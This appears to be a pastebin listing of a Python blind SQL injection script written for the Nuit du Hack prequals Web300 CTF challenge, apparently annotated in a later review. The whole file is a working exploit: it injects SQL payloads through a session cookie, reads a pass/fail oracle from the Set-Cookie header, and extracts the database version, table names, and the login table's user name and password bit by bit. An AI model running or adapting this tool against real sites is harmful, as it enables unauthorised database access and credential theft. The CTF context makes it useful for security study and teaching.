Web300-NDHPrequals-SQLIScript

By buffer, 1 Year ago, written in Python.
URL http://paste.braindead.fr/index.php/view/99510748
  1. #!/usr/bin/python
  2.  
  3. # ----------------------------------------------------------------------------
  4. # "THE BEER-WARE LICENSE" (Revision 42):
  5. # <bufferoverfl0wz [at] gmail.com> wrote this file. As long as you retain this notice you
  6. # can do whatever you want with this stuff. If we meet some day, and you think
  7. # this stuff is worth it, you can buy me a beer in return -buffer-
  8. # ----------------------------------------------------------------------------
  9. #
  10. # buffer 2 Apr 2011
  11.  
  12.  
import re
import sys

try:
    import httplib
except ImportError:  # Python 3 renamed the module
    import http.client as httplib
  14.  
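def binary(_pass, _fail, function):
    """Recover an integer through a "greater than" oracle by bisection.

    ``function(c)`` must return True while the hidden value is strictly
    greater than ``c`` and False once ``c`` has reached it (that is what
    BlindSqlIt.binaryRequest injects: ``<sql> > c``).  Starting from a probe
    known to pass (``_pass``) and one known to fail (``_fail``), the search
    narrows the interval until it returns the smallest failing probe, which
    is the hidden value itself as long as it lies in ``(_pass, _fail]``.

    The original mixed a bisection with a linear sweep of the last few
    candidates; a plain bisection needs fewer requests and gives the same
    answer for a consistent oracle.  Integer division is spelled ``//`` so
    the midpoint stays an int under Python 3 as well.

    @param _pass probe value already known to pass (hidden value > _pass)
    @param _fail probe value already known to fail (hidden value <= _fail)
    @param function oracle taking the probe value; any falsy answer counts as FAIL
    @return the recovered value; ``_fail`` itself if the value is not below it
    """
    while _fail - _pass > 1:
        mid = (_pass + _fail) // 2
        if function(mid):
            _pass = mid
        else:
            _fail = mid
    return _fail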
  47.  
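def shr(function, bits=7):
    """Recover a character bit by bit through a "shift-right equals" oracle.

    ``function(idx, val)`` must answer whether ``code >> idx == val`` for the
    hidden character code (that is what BlindSqlIt.shrRequest injects).
    Walking ``idx`` from the top bit down, ``val`` always holds the bits
    recovered so far followed by a guessed 0; when the oracle rejects that
    guess the current bit must be 1.  Any answer other than True (including
    None from a failed request) is treated as "not equal", i.e. bit set,
    exactly as the original did.

    Fixes the original loop, which iterated over an undefined name ``l``
    instead of the prepared index list and therefore raised NameError.

    @param function oracle taking (shift, expected_value)
    @param bits number of low-order bits to recover; 7 covers ASCII, pass 8
                for a full byte (MySQL ASCII() returns 0-255)
    @return the recovered character
    """
    val = 0
    for idx in range(bits - 1, -1, -1):
        val <<= 1                       # guess: next bit is 0
        if function(idx, val) != True:  # oracle says otherwise -> bit is 1
            val |= 1
    return chr(val)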
  65.  
  66.  
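class BlindSqlIt(object):
    """Boolean-based blind SQL injection client for the NDH prequals Web300 target.

    The injection point is the ``cap`` cookie sent to ``/captcha.php``: the
    server answers with a ``Set-Cookie: cap=<md5>`` header and a value equal
    to ERROR_HASH is its error marker (see isMd5Pass).  Every request is
    therefore a one-bit oracle; the module-level ``binary`` and ``shr``
    helpers combine those bits into integers and characters.

    Target host, page and PHPSESSID were hard-coded in the original paste;
    they are kept as defaults so ``BlindSqlIt()`` still works, but can be
    overridden per instance.  This is an attack tool written for a CTF:
    point it only at systems you are authorised to test.
    """

    TARGET_HOST = 'ownm3.prequals.nuitduhack.com'
    TARGET_PAGE = '/captcha.php?id=0'
    SESSION_ID = 'g1d52vl3cd463mkmrsbisl59c3'
    # Value the server sets in the cap cookie when the injected query fails.
    # NOTE(review): looks like md5("error"); the script only relies on the
    # literal, so treat it as an opaque marker.
    ERROR_HASH = 'cb5e100e5a9a3e7f6d1fd97512215282'
    # Prefix the payload is appended to in the outgoing cap cookie (same
    # literal as ERROR_HASH in the original).
    CAP_PREFIX = 'cb5e100e5a9a3e7f6d1fd97512215282'

    def __init__(self, host=None, page=None, sessionId=None):
        """
        Ctor.
        @param host fqdn of the target (default TARGET_HOST)
        @param page path to request (default TARGET_PAGE)
        @param sessionId PHPSESSID to present (default SESSION_ID)
        """
        self.host = self.TARGET_HOST if host is None else host
        self.page = self.TARGET_PAGE if page is None else page
        self.sessionId = self.SESSION_ID if sessionId is None else sessionId

    def connect(self, webSite, page, headers=None):
        """
        Do an HTTP request and return the PASS/FAIL status of the SQL
        injection request.
        @param webSite fqdn of the website
        @param page page to visit
        @param headers dictionary of HTTP headers (optional)
        @return PASS/FAIL status of the SQLi (see isMd5Pass)
        @raise RuntimeError when the server does not answer 200.  The original
               printed a message and returned None, which the callers then
               silently counted as a FAIL bit and corrupted the extraction.
        """
        conn = httplib.HTTPConnection(webSite)
        try:
            conn.request("GET", page, headers=headers or {})
            response = conn.getresponse()
            if response.status != 200:
                raise RuntimeError('Connection failure: HTTP %s on %s%s'
                                   % (response.status, webSite, page))
            return self.isMd5Pass(response.getheader('Set-Cookie'))
        finally:
            conn.close()   # the original never closed the connection

    def isMd5Pass(self, raw_cookie):
        """
        Parse the Set-Cookie header to know if it carries the error marker.
        Only the first ``name=value`` pair is examined, so attributes such as
        ``; path=/`` no longer hide the marker (the original split on every
        '=' and reported PASS for any header holding more than one).
        @param raw_cookie raw Set-Cookie header value
        @return True (PASS) when the value differs from ERROR_HASH, False (FAIL) otherwise
        @raise RuntimeError when no Set-Cookie header came back
        """
        if raw_cookie is None:
            raise RuntimeError('No Set-Cookie header in the response')
        first_pair = raw_cookie.split(';', 1)[0]
        cookie = first_pair.partition('=')[2].strip()
        print(cookie)
        return cookie != self.ERROR_HASH

    def doRequest(self, request):
        """
        Pack the SQL request in the cookie header and send it.
        The payload is appended to the cap cookie value because that is the
        value the server interpolates into its query.
        @param request SQL fragment to inject
        @return PASS/FAIL status of the SQLi
        """
        headers = {'Cookie': 'PHPSESSID=%s; cap=%s%s'
                   % (self.sessionId, self.CAP_PREFIX, request)}
        print(headers)
        return self.connect(self.host, self.page, headers=headers)

    def _oracle(self, req):
        """Send one payload, echo the verdict on stdout and return it."""
        sys.stdout.write(req + '      ')
        rslt = self.doRequest(req)
        print('PASS' if rslt else 'FAIL')
        return rslt

    def binaryRequest(self, sql, code):
        """
        Perform an SQL injection using binary method: asks whether the
        injected expression is greater than ``code``.
        @param sql sql request to inject
        @param code integer value to compare result to
        @return PASS/FAIL status of the SQLi
        """
        return self._oracle("' and %s>%i or '2'='" % (sql, code))

    def shrRequest(self, sql, bit, val):
        """
        Perform an SQL injection using shift right method: asks whether
        the injected expression shifted right by ``bit`` equals ``val``.
        @param sql sql request to inject
        @param bit number of bits to shift
        @param val integer value to compare to
        @return PASS/FAIL status of the SQLi
        """
        return self._oracle("' and (%s>>%i)=%i or '2'='" % (sql, bit, val))

    def getParameterLength(self, parameterName, maxLength=64):
        """
        Get a VARCHAR parameter length.
        @param parameterName name of the parameter (or SQL request) to get length of
        @param maxLength upper bound for the search (64 in the original)
        @return length
        @raise ValueError when the value is longer than maxLength; the
               original silently returned maxLength and truncated the dump
        """
        sql = 'length(%s)' % (parameterName)
        # One extra request guards the upper bound of the bisection.
        if self.binaryRequest(sql, maxLength):
            raise ValueError('%s is longer than %i characters' % (parameterName, maxLength))
        length = binary(-1, maxLength, lambda x: self.binaryRequest(sql, x))
        print('===> len(%s) = %i <===' % (parameterName, length))
        return length

    def getParameter(self, parameterName):
        """
        Get the result of a SQL injection, one character at a time.
        SUBSTRING is 1-based: the original also probed position 0, which
        only ever yields ASCII('') = 0, cost seven requests per value and
        crashed with IndexError on an empty value.  ``shr`` recovers 7 bits,
        so bytes >= 0x80 in the value come back wrong.
        @param parameterName can be a variable or a SQL request to get value of
        @return value of sql request
        """
        length = self.getParameterLength(parameterName)
        chars = []
        for i in range(1, length + 1):
            sql = 'ASCII(SUBSTRING(%s, %i, 1))' % (parameterName, i)
            letter = shr(lambda x, y, sql=sql: self.shrRequest(sql, x, y))
            print('===> %s[%i] = %s <===' % (parameterName, i, letter))
            chars.append(letter)
        return ''.join(chars)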
  176.  
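def main():
    """Dump the DB version, the first four table names and the id=1 login row."""
    sqlit = BlindSqlIt()
    print(sqlit.getParameter('@@version'))

    # Try to get the 4 first tables.  The LIMIT offset has to follow the
    # loop index: the original used a constant ``limit 1,1`` and fetched
    # the same table name four times.
    for i in range(4):
        tableName = sqlit.getParameter('(SELECT table_name from information_schema.tables where table_schema=DATABASE() limit %i,1)' % i)
        print('table[%i]=%s' % (i, tableName))

    print(sqlit.getParameter('(SELECT user from login where id=1)'))
    print(sqlit.getParameter('(SELECT pass from login where id=1)'))


if __name__ == '__main__':
    main()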
  187.  
  188.  
  189.  
  190.  
